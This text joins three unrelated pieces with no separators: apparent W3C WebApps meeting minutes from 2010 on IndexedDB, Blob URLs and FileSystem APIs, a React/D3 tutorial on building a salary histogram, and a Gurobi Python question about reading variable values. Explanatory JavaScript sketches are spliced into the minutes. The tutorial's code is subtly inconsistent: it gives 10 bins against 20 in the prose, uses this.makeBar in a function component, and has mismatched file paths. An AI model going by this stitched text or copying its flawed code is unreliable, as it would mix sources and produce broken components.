scribe: which is cross browser
sicking: we're using a somewhat different approach
shepazu: when i tried to do test first / test in parallel
... i unfortunately failed
... i couldn't get the resources together in order to do that
<adam> Selenium can be automated using something like Hudson
shepazu: do people find it valuable to develop tests in parallel, at the same time as developing the spec?
David: with WAC we made sure that there are Test Assertions as you write the spec
<dom> A Method for Writing Testable Conformance Requirements
David: the outcome of what you want can be written out as the spec is written
... you have a test description file that links back to the spec
shepazu: is there interest in imposing this on the WG?
artb: yes, I took an action to work this out
... we'd put forward a proposal to the WG
... no one objected
adrianba: i volunteer to help define the process proposal
david: we strongly support any work in testing
david: we've had complaints in WAC, the other stuff has been quite difficult for us to test (for lack of tests)
anne: DOM Level 3 Core was a REC a long time ago
... there's various differences in what web browsers implemented and what the spec says
[ anne describes differences ]
<Barstow> ArtB: Web DOM Core abstract:
anne: there are a few things HTML5 currently defines, which I think should be moved back to DOM Core ...
... like what createElement does
<shepazu> [here's a short analysis of a case of WRONG_DOCUMENT_ERR: ]
anne: and defining what Document.charset/Document.defaultCharset/... are.
... but leaving HTML to define when it sets them
... there's a more ambitious goal of getting rid of AttrNodes
[ sicking talks about DOM UserData ]
sicking: i'm surprised no one has got requests for them
sam: we have
... but in the past we've said can't you use set property?
... and that's been good enough for them
sicking: but you could get conflicts with future specs
... yeah i'm all for getting rid of AttrNodes
... i was talking to travis from Microsoft about it
... we might need to add ownerElement on the Attr
... the main goal is to make them not be nodes
anne: this would move the namespaceURI away from Node
sicking: attribute nodes, i know we keep having security issues with
anne: the other things, it would be nice to get rid of, but it isn't terribly important
... namespaceURI is only relevant for Element and Attr
sicking: it's useful for simple traversal
anne: the main reason is to avoid casting in Java
sicking: forms does the same thing, so you can iterate the forms.elements array
... so you can avoid checking the type before getting properties
anne: but what would you be doing?
sicking: ...i don't know...
artb: so, this afternoon will be IndexedDB, chaired by Anne
sicking: is anyone else planning to try to start removing these things?
anne: we don't want to lead
sam: webkit would be interested in trying in nightlies
anne: we have already removed DOM UserData by not implementing it
sam: I have done the same for years, by not implementing it
anne: we are not actively removing things, but we have tried to restrain ourselves from implementing things
... we would really like the Attr thing
sam: Are there any NodeLists that return Nodes other than Elements?
anne: there were. but I tried to kill those
... maybe there are no longer
Break for Lunch
<anne> arun, you there?
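Before the break, sam's suggestion for replacing DOM UserData was "can't you use set property?". A minimal sketch of that idea in plain JavaScript, using a side table so script-set metadata cannot collide with properties future specs may define on nodes (plain objects stand in for DOM nodes here; the function names are illustrative, not from any spec):

```javascript
// Sketch: emulating DOM Level 3 setUserData/getUserData with a side table.
// Keeping the data in a Map (a WeakMap would tie entries to node lifetime)
// avoids putting expando properties on the node itself.
const userData = new Map();

function setUserData(node, key, value) {
  if (!userData.has(node)) userData.set(node, {});
  userData.get(node)[key] = value;
}

function getUserData(node, key) {
  const data = userData.get(node);
  return data ? data[key] : undefined;
}

// A plain object stands in for a DOM node in this sketch.
const node = { nodeName: "div" };
setUserData(node, "role", "button");
```

This is roughly what libraries ended up doing once browsers dropped UserData, which is why removing it was considered low-risk.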
<anne> arun, you want to dial in for Indexed DB?
<MikeSmith> arun: you got a Skype ID?
<arun> Hi there Mike
<MikeSmith> hey man
<arun> MikeSmith: I'd like to dial in if possible.
<arun> anne: I'd like to dial in if possible.
<MikeSmith> scribe: MikeSmith
<adam> Adam Boyet - Boeing
Pablo: there is a list of topics on the mailing list
<anne>
pablo: shall we do Keys?
... keys and tables… what we have today is simple keys
… compound keys, custom orders
<anne> Indexed DB:
… e.g., by date + by integer
… key value would be an array
sicking: not sure what syntax we should use
sicking: one proposal was array of "key paths"
jorlow: compound keys, being able to have arrays in your keys; another thing is compound indexes
pablo: can't we reduce that to the same problem?
jorlow: one is part of the structure of the DB, one is something you can do more ad hoc
… key could be array one time, a string or something else the next
<anne> who is +1.408.446.aabb? Nikunj?
<Nikunj> Nikunj
<anne> kk
<anne> screw you Zakim
pablo: rule of strictly sorting by type, then sort by value is very sharp
jorlow: another question is, what do we want to do if you have a key path to "foo" and you insert an item that doesn't include a "foo"
[discussion about what to do if a key path resolves to an array]
sicking: every place where we currently allow values we should also allow arrays
[discussion about difficulty of implementing]
[sicking demonstrates with some code]
pablo: Option A is an array is just a single value
jorlow: example is that people can have multiple names, and you can construct an index such that multiple names map to the same person
pablo: I am not sure about composite keys made of arrays
sicking: the 2nd case is multiple records pointing to the same object store
<Nikunj> I thought that composite key means there are many parts to a key and that the parts are obtained from different paths
<Nikunj> The discussion seems to be about a single path
resolving to multiple values
sicking, see Nikunj comment
sicking: Nikunj, I agree with your interpretation
jorlow: yeah, agreed
... what are we going to do in the case where you are inserting a value that doesn't include something for a key path
e.g., you are inserting a person and you don't include a first name, and the first name is the key
<Nikunj> Multiple keys in an index pointing to a single object is not the same use case as compound key
jorlow: pablo, you seem to be worried that any handling of arrays is going to be a lot of work
<Nikunj> The latter is about constructing a key serialization from multiple keypaths
<Nikunj> The former changes the meaning of a key
<Nikunj> there is a difference between composite and compound keys
<Nikunj> See
sicking: in solution A we can have a mix of values and arrays.
jorlow: should we allow keys to be indexes?
... the only use case is, search on multiple keys
... use case 1 is, my DB has people in it, with first name and last name
… and I want to search for everybody who has both a certain first name and a certain last name
jorlow: use case 2 is database contains people, find person with name "foo", be that first or last name
... 3rd possibility is first-name entry, last-name entry, then an entry that has both that duplicates the first two
<jorlow>
jorlow: choice is, do you want users to have to duplicate their data? or do you want to have duplicated indexes
anne: so there's no AND?
jorlow: there's no query language
Nikunj: I am not sure you need composite keys nor compound keys
jorlow: specifying a join language is a very big task
… for that, you can take whatever we've done so far here and multiply it by 100
Nikunj: I am looking for a join _primitive_
pablo: scenario is, you expect sort order to be in accord with your language
<Nikunj> See for a description of the join primitive
sicking: question is, are we happy with having a language on a DB-wide basis?
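Pablo's "strictly sorting by type, then sort by value" rule, with arrays as keys compared element-wise, can be sketched in plain JavaScript. The exact type ranking below (number < date < string < array) is an assumption for illustration, not agreed spec text:

```javascript
// Sketch of IndexedDB-style key comparison: keys sort first by type,
// then by value within a type; array keys compare element by element.
// The type order used here is an assumption chosen for illustration.
function keyType(key) {
  if (Array.isArray(key)) return 3;
  if (typeof key === "string") return 2;
  if (key instanceof Date) return 1;
  if (typeof key === "number") return 0;
  throw new TypeError("not a valid key in this sketch");
}

function compareKeys(a, b) {
  const ta = keyType(a), tb = keyType(b);
  if (ta !== tb) return ta < tb ? -1 : 1; // strict sort by type first
  if (ta === 3) {
    // arrays: element-wise comparison, shorter array sorts first on a tie
    const n = Math.min(a.length, b.length);
    for (let i = 0; i < n; i++) {
      const c = compareKeys(a[i], b[i]);
      if (c !== 0) return c;
    }
    if (a.length !== b.length) return a.length < b.length ? -1 : 1;
    return 0;
  }
  const va = ta === 1 ? a.getTime() : a;
  const vb = tb === 1 ? b.getTime() : b;
  return va < vb ? -1 : va > vb ? 1 : 0;
}
```

Under this rule a compound key like `["Smith", "Jane"]` sorts usefully for the "first name and last name" use case jorlow describes, without any query language.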
[as opposed to per object store]
<anne> jorlow: my vote is, don't do it
<Nikunj> What is the current topic?
<anne> Transactions
<anne> ... all transactions have time-consistency
<anne> ... how implementations achieve that is up to the implementation
<anne> ... for writers you can only have one writer happening at the time
<anne> ... unless they are separate object stores/tables
<anne> ... you could figure out the overlap and be very smart... whatever (something like that)
<anne> ... should be some more non-normative text that explains this
<anne> JS: if you start two transactions; is there any guarantee with respect to order?
<anne> JO: I don't think so; get weird behavior with locking; would be shame as we get less concurrency
<anne> JS: what if there is overlap
<anne> JS: read, readrequest, write, writerequest
<anne> JO: no order guaranteed
<anne> JS: sounds very racy
<anne> JO: if you cared do not start them at the same time
<anne> Pablo: I don't think it is strictly a race
<anne> JO: what is the use for starting them at the same time?
<anne> Pablo: there should not be starvation
<anne> JS: already says that
<anne> JS: in Firefox there's no raciness and you always know the order
<anne> JS: and no starvation either
<anne> JO: I can't think of any reason you start these and expect them to run in the same order
<anne> thank you darobin
<anne> Pablo: workers also introduce these problems
<anne> within one worker you can only have one transaction
<anne> that assumes requiring locks is in order
<anne> make minutes
<mjs> ScribeNick: weinig
<weinig> js: you already have to lock tables
<weinig> js: we have to make the transaction function take a callback
<weinig> pablo: why can't we make the second transaction fail
<weinig> js: it would be very confusing for two independent libraries to interact together
<weinig> pablo: that syntax seems very unwieldy
<weinig> jo: the function is just defining scope
<weinig> js: transactions within the function will throw
<weinig> jo: is anyone planning to implement sync
<weinig> jo: should we have a warning in the spec?
<weinig> jo: editors should try and keep sync and async in sync
<weinig> pablo: is everyone planning on doing async in main context and sync and async in workers?
<weinig> everyone: yes
<Nikunj> can implementors provide an update on their implementation status/plans
<weinig> pablo: should transactions be allowed in transactions?
<weinig> jo: maybe we should have an open nested transaction
<weinig> pablo: everything you would need to do you can do off the transaction
<weinig> pablo: lets ignore the last few lines
<anne> scribe: anne
RESOLUTION: not automatically assign to Nikunj; MikeSmith to follow up
We have room number 4 all day tomorrow
times to be announced
<MikeSmith> if the problem is that Nikunj is not in the tracker DB I can add him now
Pablo: by default we are not going to let apps fill the disk; so what to do
<MikeSmith> trackbot, status?
Pablo: lots of degrees of freedom
MikeSmith, it would be nice if it was assigned to a nobody instead since Nikunj is not the only editor
<MikeSmith> hai
<MikeSmith> I will change it now
Pablo: bytes are not necessarily meaningful as a unit
great
Pablo: first attempt to use the database; anything the app needs to do?
SQL DB estimated size argument was very confusing
Dealing with size constraints: 1) no API impact
Chrome has a hard limit (with a non-specced error)
conclusion seems to be that some kind of quota error is needed
the spec does not say you create the index asynchronously
JO: i think it is implied
Pablo: it should be explicit
JO: i think it is in there, maybe should be more explained
... if it fails it fails the transaction
Does there need to be a way for asking for more space?
adrianba: in Silverlight we wanted to give the app more control
... if e.g. you download a huge file you do not want the UA to have to ask and ask again
... but instead allocate once
JO: use cases are caching and some kind of persistent storage (i.e. offline written email)
Pablo: impossible for us to decide
JO: in Chrome we plan to group APIs together
... if you get 10 MB you can use it for several APIs
AvK: for the hint for the pre-allocation of memory case it should be a generic API if we are heading in that direction
JO: for the persistent vs temporary case that should be noted on the object store
... maybe change createObjectStore (or something like that) to take this as parameter
adrianba: how long do blobs persist?
JS: tied to the Window object
Eric: if you want to change a Blob you create a new one
... you cannot create a File at the moment
... a file has a last modified time and a name
Pablo: I'm assuming when you store it in the DB it is a copy
JS: I hope Indexed DB to be enough
... not need a File System ...
... I don't want File System to have a capability that Indexed DB does not
which is that you can modify a file that is stored (if the scribe gets it correctly)
[questions on this topic are best asked on the list]
JO: should we set goals
adrianba: address the existing issues
JO: full text search is important
... not gonna be efficient with what we have now
... full text search is extremely important to Google
<arun> Full text search was important to external developers as well.
JO: I hope that one or two changes to the API can make this possible
... I want to get proof first, before adding something to the specification
synchronizing...
Pablo: some kind of tracking tombstones?
[further discussion on list]
arun, you still here?
<arun> anne, yep
cool
I guess Jonas can go through the File API mostly
might be tricky over the phone
<arun> anne, it's cool. I can hear you guys really clearly
<arun> anne, if I need to speak I'll just speak up.
<arun> anne, you can refer to the email I sent about agenda stuff if you like.
<arun> anne is the URL string trouble maker
<jorlow> scribe: jorlow
anne, doesn't like adding 2 more methods to window
arun, any other solution is back to the drawing board
anne, vendor prefixing might help limit usage
anne, but we still need to find the right solution
ericu, stuff put on the global object so that stuff is tied to the lifetime of the window
jonas: when window is navigated away, all urls are revoked
sam: you can do that regardless of the syntax
ericu: what about if you pass from one window to another? this is more explicit
sam, disagrees
jonas, is fine with other suggestions. thinks reusing url is weird because it's only somewhat related
sam, so you could just have a blobURI object
jonas, an object might make sense....something about domURL
anne, don't you want to stringify it as well?
jonas, no
jonas, you'd create an object from a string
anne, you're still not solving the problem
jonas, trying to solve 2 problems
jonas, something so we don't create strings...for that, need to create a new type of interface...call it domURL for now
anne, domURL could be some union type of blob and stream
jonas, don't want create to be through some constructor and revoke through a completely different api
jonas: we could create a global dummy object with both methods
arun: is it worth making the global dummy object the same thing being specced by adam barth
no
jonas: abarth's thing is to solve parsing urls. this isn't what we need to do with blob urls
anne: not so sure
jonas: there's a vague resemblance given that they both revolve around URLs
sam: agrees
... especially since adam's thing doesn't exist yet
... can we discuss other things?
jonas: the proposed solution is some global object where we put 2 functions
anne: is there some existing place we could put them?
sam: maybe window.blob? but you want to do it for stream too so maybe that's not a good place
ericu and others: k, let's move on
sam: 2 questions. file list has been redefined to be a sequence of files rather than a simple object. our implementation has file lists like node lists. sequence doesn't have an item function.
anne: cameron said sequence isn't for that type of thing
jonas: saw hixie open a bug on something similar today
sam: in the mean time, should we go back to the simple interface?
anne: file lists should probably follow others
general agreement
sam: file reader + writer have event handler attributes but don't inherit from event target.
arun: it does
sam: sees it...what about writer?
ericu: if so, it's a bug
anne: we should have some consistency
sam: using implements probably makes sense (vs. inheriting) in the spec
arun: agrees with sam
anne: XHR inherits
sam: in webkit, event target isn't in the prototype chain ...
... does it affect it though?
anne: maybe xhr should change
jonas: no advantage to not inheriting
sam: let's avoid multiple inheritance
jonas: agrees
... but most of these things don't inherit
anne: XHR does
jonas: but you can add it to the bottom of the chain
sam: everything in svg uses multiple inheritance
... we should probably bring this up as a WebIDL issue
jonas: it's unfortunate you can't add stuff to event target prototype
sam: if we could solve multiple inheritance in a good way, then maybe it's a non-issue
... jonas, are you coming to tc39?
jonas: yes
anne: do we have anything more on file api?
jonas: request from google...when you request url, wants to do something related to content type (didn't understand)
i didn't understand
<arun> arun: do we still have URL string dereferencing behavior?
ericu: right now content type is a property of blob
... we could add these properties to blob directly
arun: only content disposition was asked for
... just like content type
<MikeSmith> i/What is the current topic/scribe: anne
<MikeSmith> dunno
jonas: darin fisher has asked for content disposition. jonas has said to use file saver back to him
... and point the file saver to the blob directly
ericu: we want blob url to work just like any other
<arun> arun: right, so instead of Content-Disposition on Blob URLs, you have a URL argument to the FileSaver constructor.
ericu: gmail offline, for example, wants to be able to view and download with similar code. just different urls. presentation layer stays same, but backend just gives different urls
sam: not sure he understands why you'd create a url from a blob and pass it to an XHR
jonas: not sure anyone suggested this
sam: isn't that the reason to set headers: to get it through XHR?
jonas: no, it was just to explain
... iframes care about headers ...
... to do gmail file saving, create iframe, take blob, create url, content dis. header, iframe looks at that header, it works
ericu: can't you do that today?
... only need iframe trick if you don't have content disposition header
... wait...hm...
jonas: link with target: _blank
sam: that opens a window
anne: behavior varies
sam: agreed
... very marginal use case
jonas: it's a very roundabout way of triggering file save dialog
<arun> arun: +1 to sam, sicking
ericu: urls have these properties already
... making offline urls work just like online urls seems nice
sam: they're more a property of the resource, not the url itself
jonas: it's actually a property of the person initiating the load
... make file saver support taking a url
... same architecture for blobs and urls
sam: some browsers' default behavior is not to prompt but to download to a directory
... so that'd behave differently
... iframe with content disposition treated as download, file saver treated as save as
jonas: i'm not sure we'd behave differently
timeless: we shipped that behavior 2+ years ago
<timeless> [we = Mozilla/Firefox]
ericu: if you want file saver to do the default, that's another behavior
jonas: if people only want a download mechanism, we should do it right, not extend a hack
arun: the hack exists for http reasons
... ericu's "uber question" is a good one
ericu: allowing all headers in seems cleaner
anne: it's complicated if we only care about content disposition
sam: setting something like x frame options could be useful
... my recollection is that most of these things are attributed to the resource not the url
... it seems a bit hackish to set headers on a blob
ericu: agrees. a blob might never be used as a url
... in some cases, the headers are more associated with the url rather than the resource itself
jonas: this discussion has gotten a bit meta
... should the headers arguments exist on the blob or the create url function
sam: that's one question.
... the other is whether we need the headers
ericu: likes headers. if we have them, put them on the createURL function
anne: let's move discussion to list
... talks about his sneaky plan
ericu: we can go back to file after writer/system questions
<timeless> the example for using URL instead of Blob to have the bits is to match Gmail where an image attachment has View and Download links - two urls to the same blob data
ericu: doesn't have any issues to bring up
anne: can you give a quick introduction?
ericu: does said introduction...
<timeless> s/cut/duct/
<anne> s/FileSaver/File: Writer and File: Systems and Directories/
sam: so file writer sync doesn't pop up a dialog?
ericu: yup
... this is just a writing interface...doesn't describe how to get access
... file system spec gives another way to get access to a file
... otherwise the only way is file saver
... file system is like a chrooted environment to create dirs, files, etc
... file system is good if your data isn't structured
... game designers want this for art assets, for example
sam: what about indexeddb
jorlow: or app cache
ericu: not good match for app cache...it's all or nothing
jonas: thinks file system is not needed
... because of indexedDB
sam: data cache or an extension to app cache might have worked as well
ericu: yes
sam: what about various databases
sam: jonas's face was scary
ericu: it's a matter of taste
sam: seems like adding this much API surface area for a matter of taste is bad taste
ericu: it's more than just taste
<arun> arun: I agree with ericu about it being a matter of taste. Some like file system based metaphors, and some like databases for everything.
ericu: sharing data with apps outside of the browser is good too
sam: indexedDB could store files in the file system if it wanted to
ericu: that seems odd. no hierarchy
jonas: yeah, no meta data
ericu: gives a use case
sam: if that's a use case, it should be explicit in spec ...
... and what about when the file system doesn't exist
ericu: that's one reason to make it explicit in the spec
... it's a significant motivator, but not required
jorlow: you could store meta data ad-hoc in indexedDB if you wanted to
jonas: the meta data will be understandable by other apps
... hurdle: some people are nervous about allowing websites to save stuff to a known location
sam: we probably want to add changes to mac os X to allow ..?
ericu: in the current implementation, files are not saved in a known location
... describes the hack
... many apps know how to scan a hierarchy of dirs (that can scan it in)
timeless: then you just exploit some app like iTunes or Picasa
adrianba: what about social engineering
ericu: opening a file deep in the chrome profile dir...?
... and your av software should still run on it
adrianba: they have support for knowing the source of the download
sam: mac os x too
jorlow: can't the file system api just set the bits
<timeless> windows too
adrianba: we distinguish between url and site
ericu: this makes it slightly harder, but it's not a fundamental issue
adrianba: allowing a web application to save something without immediate consent of user...then social engineering
<timeless> [ such as attacking Sherlock, Google Desktop Search ]
ericu: it's a valid concern and i understand. you might just need to tweak the reputation system a bit to handle this case
sam: my issue is not security, it's that we already have a lot of storage options
... unnecessary risk to throw 2 new APIs at the web at once
<arun> OK big +1 to weinig
ericu: well it's not there yet and it won't necessarily be popular
sam: but it can never be removed
jorlow: isn't it behind a prefix
timeless: that doesn't matter much
ericu: and actually our implementation is not behind a prefix
... which is a fair objection
... a number of devs asked for it
sam: web sql is same
sam: we should have been more careful and not done it
... has actual question
... file saver sync doesn't seem to have an actual interface attached to it?
ericu: will fix it
sam: from a worker, would you pop up a save dialog
... what window would it be attached to
ericu: shared worker is an odd case
jorlow: brought up more similar shared worker issues
ericu: yeah...we need to fix some stuff
jonas: want file save to be able to handle the url
... content disposition is a hack, so it'd be nice to move away from it
<arun> Yeah; while we hash out headers on Blob URIs, I think it's good to allow FileSaver to have a URL argument
sam: people already hack around it, iframe trick might as well become official
... anne are you editing progress events?
... is there going to be some way to say some interface implements something...rather than repeating the work for each progress event
jonas: there's some web idl way to say supplemental, but reverse
ericu: onloadstart, and that doesn't make sense when you're writing
<anne> jonas: interesting situation when you want progress events for something other than loads since many of them have load in the name
anne: they're actually specced to be pretty vague
... can't rename them at this point
adrianba: could you have multiple names for something
sam: this is a bad idea because events are expensive, therefore firing 2 events is expensive
... we've done this for focus and DOMFocus
mjs: you can't actually alias because of addEventListener's semantics
jonas: agreed, aliasing is bad
anne: the event names are just suggestions
... you can call your events whatever you want
jonas: it makes sense to do things this way
sam: should they be savestart?
ericu: filewriter derives from this and uses the same events
jonas: the interface names are fully generic
anne: interface still has loaded
ericu: I think I just put done?
... going to fix the spec
mjs: we should change the syntax of html
<mjs> </sarcasm>
ericu: taking a step back....
sam: when people implement event listeners, the event they get will be a little funny because it has words like loaded
anne: inherited progress events from svg...no one backed me up
mjs: lots of bike shedding
jonas: it sucks to add aliases
sam: maybe add progress of loaded that calls the same underlying function
... bytes progressed maybe?
jonas: just use progress
anne: we do have some aliased properties elsewhere I guess
... let's leave "early"
anne's chairing skillz are celebrated
Scribes: Mike_Smith, MikeSmith, anne, jorlow
Present: ArtB, DougS, MikeSmith, Geoffrey, SamW, Maciej, DaveR, Olli, Adrian, EliotG, LaszloG, YaelA, AnssiK, SureshC, Dom, Johnson, AnneVK, KlausB, Wonsuk_Lee, RichardT, BryanS, KaiH, Bryan_Sullivan, Jonas, Pablo, Jeremy, Andrei, BoChen, DavidRogers, EricU, AdamB, Anssi_Kostiainen
Date: 02 Nov 2010
http://www.w3.org/2010/11/02-webapps-minutes.html
Render a Histogram of salaries

Knowing median salaries is great and all, but it doesn't tell you much about what you can expect. You need to know the distribution to see if it's more likely you'll get 140k or 70k.

That's what histograms are for. Give them a bunch of data, and they show its distribution. We're going to build one like this:

In the shortened dataset, 35% of tech salaries fall between $60k and $80k, 26% between $80k and $100k, etc. Throwing a weighted die with this random distribution, you're far more likely to get 60k-80k than 120k-140k.

It's a great way to gauge situations. It's where statistics like "More people die from vending machines than shark attacks" come from. Which are you afraid of, vending machines or sharks? Stats say your answer should be heart disease. 😉

We'll start our histogram with some changes in App.js, make a Histogram component using the full-feature approach, add an Axis using the blackbox useD3 approach, and finally add some styling.

Step 1: Prep App.js

You know the drill, don't you? Import some stuff, add it to the render() method in the App component.

    // src/App.js
    import _ from "lodash"
    // Insert the line(s) between here...
    import "./style.css"
    // ...and here.

    import Preloader from "./components/Preloader"
    import { loadAllData } from "./DataHandling"

    import CountyMap from "./components/CountyMap"
    // Insert the line(s) between here...
    import Histogram from "./components/Histogram"
    // ...and here.

We import style.css and the Histogram component. That's what I love about Webpack - you can import CSS in JavaScript. We got the setup with create-react-app.

There are competing schools of thought about styling React apps. Some say each component should come with its own CSS files, some think it should be in large per-app CSS files, many think CSS-in-JS is the way to go. Personally I like to use CSS for general cross-component styling and styled-components for more specific styles.
We're using CSS in this project because it works and means we don't have to learn yet another dependency.

After the imports, we can render our Histogram in the App component.

    // src/App.js
    // ...
    render() {
      // ...
      return (
        <div className="App container">
          <h1>Loaded {this.state.techSalaries.length} salaries</h1>
          <svg width="1100" height="500">
            <CountyMap usTopoJson={this.state.usTopoJson}
                       USstateNames={this.state.USstateNames}
                       values={countyValues}
                       x={0}
                       y={0}
                       width={500}
                       height={500}
                       zoom={zoom} />
            // Insert the line(s) between here...
            <Histogram bins={10}
                       width={500}
                       height={500}
                       x="500"
                       y="10"
                       data={filteredSalaries}
                       axisMargin={83}
                       bottomMargin={5}
                       value={d => d.base_salary} />
            // ...and here.
          </svg>
        </div>
      );
    }

We render the Histogram component with a bunch of props. They specify the dimensions we want, positioning, and pass data to the component. We're using filteredSalaries even though we haven't set up any filtering yet. One less line of code to change later 👌

That's it. App is ready to render our Histogram. You should now see an error about missing files. That's normal.

Step 2: CSS changes

As mentioned, opinions vary on the best approach to styling React apps. Some say stylesheets per component, some say styling inside JavaScript, others swear by global app styling. The truth is somewhere in between. Do what fits your project and your team. We're using global stylesheets because it's the simplest.

Create a new file src/style.css and add these 29 lines:

    .histogram .bar rect {
      fill: steelblue;
      shape-rendering: crispEdges;
    }

    .histogram .bar text {
      fill: #fff;
      font: 12px sans-serif;
    }

    button {
      margin-right: 0.5em;
      margin-bottom: 0.3em !important;
    }

    .row {
      margin-top: 1em;
    }

    .mean text {
      font: 11px sans-serif;
      fill: grey;
    }

    .mean path {
      stroke-dasharray: 3;
      stroke: grey;
      stroke-width: 1px;
    }

We won't go into details about the CSS here. Many better books have been written about it.
In broad strokes:

- we're making .histogram rectangles – the bars – blue
- labels are white 12px font
- buttons and .rows have some spacing
- the .mean line is a dotted grey with gray 11px text

More CSS than we need for just the histogram, but we're already here so might as well write it now. Adding our CSS before building the Histogram means it's going to look beautiful the first time around.

Step 3: Histogram component

We're following the full-feature integration approach for our Histogram component. React talks to the DOM, D3 calculates the props.

We'll use two components:

- Histogram makes the general layout, dealing with D3, and translating raw data into a histogram
- HistogramBar draws a single bar and labels it

We create the Histogram.js file. Start with some imports and a stubbed out Histogram component.

    // src/components/Histogram.js
    import React from "react"
    import * as d3 from "d3"

    const Histogram = ({
      bins,
      width,
      height,
      x,
      y,
      data,
      axisMargin,
      bottomMargin,
      value,
    }) => {
      const histogram = d3.histogram()
      const widthScale = d3.scaleLinear()
      const yScale = d3.scaleLinear()

      return null
    }

We import React and D3, and set up Histogram with 3 D3 elements:

- a histogram generator
- a linear width scale
- a linear y scale

Rendering the histogram

    // src/components/Histogram.js
    const histogram = d3.histogram().thresholds(bins).value(value)

    const bars = histogram(data),
      counts = bars.map((d) => d.length)

    const widthScale = d3
      .scaleLinear()
      .domain([d3.min(counts), d3.max(counts)])
      .range([0, width - axisMargin])

    const yScale = d3
      .scaleLinear()
      .domain([0, d3.max(bars, (d) => d.x1)])
      .range([height - y - bottomMargin, 0])

First, we configure the histogram generator. thresholds specifies how many bins we want and value specifies the value accessor function. We get both from props passed into the Histogram component. In our case that makes 20 bins, and the value accessor returns each data point's base_salary.
We feed the data prop into our histogram generator, and count how many values are in each bin with a .map call. We need those to configure our scales.

If you print the result of histogram(), you'll see an array structure where each entry holds metadata about the bin and the values it contains.

Let's use this info to set up our scales.

widthScale has a domain from the smallest (d3.min) bin count to the largest (d3.max), and a range of 0 to width less a margin. We'll use it to calculate bar sizes.

yScale has a domain from 0 to the largest x1 coordinate we can find in a bin. Bins go from x0 to x1, which reflects the fact that most histograms are horizontally oriented. Ours is vertical so that our labels are easier to read. The range goes from 0 to the maximum height less a margin.

Now let's render this puppy.

render

    // src/components/Histogram.js
    <g className="bars">
      {bars.map((bar) => (
        <HistogramBar
          percent={(bar.length / data.length) * 100}
          x={axisMargin}
          y={yScale(bar.x1)}
          width={widthScale(bar.length)}
          height={yScale(bar.x0) - yScale(bar.x1)}
          key={`histogram-bar-${bar.x0}`}
        />
      ))}
    </g>

We take everything we need out of props with destructuring, call histogram() on our data to get a list of bars, and render. We return a <g> grouping element and walk through the bars array, rendering a HistogramBar for each. Later, we're going to add an Axis as well.

This is a great example of React's declarativeness. We have a bunch of stuff, and all it takes to render is a loop. No worrying about how it renders, where it goes, or anything like that. Walk through data, render, done.

Setting the key prop is important. React uses it to tell the bars apart and only re-render those that change.

Step 4: HistogramBar (sub)component

Before our histogram shows up, we need another component: HistogramBar. We could have shoved all of it into the Histogram component, but it makes sense to keep it separate. Better future flexibility.
You can write small components like this in the same file as their main component. They're not reusable since they fit a specific use-case, and they're small enough so your files don't get too crazy. But in the interest of readability, let's make a HistogramBar component.

    // src/components/Histogram.js
    const HistogramBar = ({ percent, x, y, width, height }) => {
      let translate = `translate(${x}, ${y})`,
        label = percent.toFixed(0) + "%"

      if (percent < 1) {
        label = percent.toFixed(2) + "%"
      }

      if (width < 20) {
        label = label.replace("%", "")
      }

      if (width < 10) {
        label = ""
      }

      return (
        <g transform={translate} className="bar">
          <rect width={width} height={height - 2} />
          <text textAnchor="end" x={width - 5} y={height / 2 + 3}>
            {label}
          </text>
        </g>
      )
    }

We start by deciding how much precision to put in the label. Makes the smaller bars easier to read :) For the narrowest bars we drop the label entirely. Then we render a rectangle for the bar and add a text element for the label. Positioning based on size.

You should now see a histogram.

Step 5: Axis

Our histogram is pretty, but it needs an axis to be useful. You've already learned how to implement an axis when we talked about blackbox integration. We're going to use the same approach and copy those concepts into the real project.

Axis component

We can use the useD3 hook from my d3blackbox library to make this work quickly.

    // src/components/Axis.js
    import React from "react"
    import { useD3 } from "d3blackbox"
    import * as d3 from "d3"

    const Axis = ({ x, y, scale, type = "Bottom" }) => {
      const gRef = useD3((anchor) => {
        const axis = d3[`axis${type}`](scale)
        d3.select(anchor).call(axis)
      })

      return <g transform={`translate(${x}, ${y})`} ref={gRef} />
    }

    export default Axis

We use D3's axis generator based on the type prop and pass in a scale. To render, we select the anchor element and call the axis generator on it.

Add Axis to Histogram

To render our new Axis, we add it to the Histogram component.
It's a two step process:

- Import the Axis component
- Render it

    // src/components/Histogram/Histogram.js
    import React, { Component } from "react"
    import * as d3 from "d3"
    // Insert the line(s) between here...
    import Axis from "./Axis"
    // ...and here.

    // ...

    const Histogram = () => {
      // ...
      return (
        <g className="histogram" transform={translate}>
          <g className="bars">{bars.map(this.makeBar)}</g>
          // Insert the line(s) between here...
          <Axis x={axisMargin - 3} y={0} data={bars} scale={yScale} />
          // ...and here.
        </g>
      )
    }

We import our Axis and add it to the render method with some props. It takes an x and y coordinate, the data, and a scale.

An axis appears. If that didn't work, try comparing your changes to this diff on Github.
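As an aside, the bin metadata that a histogram generator returns (each bin's x0/x1 boundaries plus a count of the values it holds) is easy to mimic outside D3. Here's a hypothetical sketch in Python rather than JavaScript (the function name and sample salaries are made up; this is not project code) of the same equal-width binning that produces distribution percentages like the 35% / 26% figures quoted earlier:

```python
# Hypothetical illustration of what a histogram generator computes:
# equal-width bins, each carrying its boundaries (x0, x1) and a count.

def make_bins(values, bin_width):
    # Snap the first bin edge to a multiple of bin_width below the minimum.
    lo = min(values) // bin_width * bin_width
    hi = max(values)
    bins = []
    x0 = lo
    while x0 <= hi:
        x1 = x0 + bin_width
        members = [v for v in values if x0 <= v < x1]
        bins.append({"x0": x0, "x1": x1, "length": len(members)})
        x0 = x1
    return bins

salaries = [65, 72, 78, 85, 90, 99, 105, 110, 125, 140]  # made-up $k values
for b in make_bins(salaries, 20):
    pct = b["length"] / len(salaries) * 100
    print(b["x0"], b["x1"], f"{pct:.0f}%")
```

Each dict mirrors a d3 bin: x0/x1 give the bin's extent, and length is the count that the width and y scales consume.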
https://reactfordataviz.com/tech-salaries/salaries-histogram/
How can I get values of variables awaiting model update in Gurobi python (Answered)

I develop a quadratic programming model using the Gurobi Python API. In terms of objective formulation containing a function associated with the decision variables, such as obj = f(x) + g(y), I need to get values of the decision variables for the functions f(), g(). This is why the input of the functions f(), g() should be a list- or array-type format acceptable to those functions, while the Gurobi model uses a tupledict structure that does not fit general calculation. How can I get values of variables awaiting model update, as below?

    x[0] : <gurobi.Var Awaiting Model Update>

---------------------- pseudo code ---------------------------

    import gurobipy as gp
    from gurobipy import GRB

    def func():
        mdl = gp.Model()
        x = mdl.addVars(100, lb=0, vtype=GRB.INTEGER)
        for i in range(100):
            _x[i] = x[i]    # TypeError: float() argument must be a string or a number, not 'Var'
            _x[i] = x[i].X  # AttributeError: Index out of range for attribute 'X'
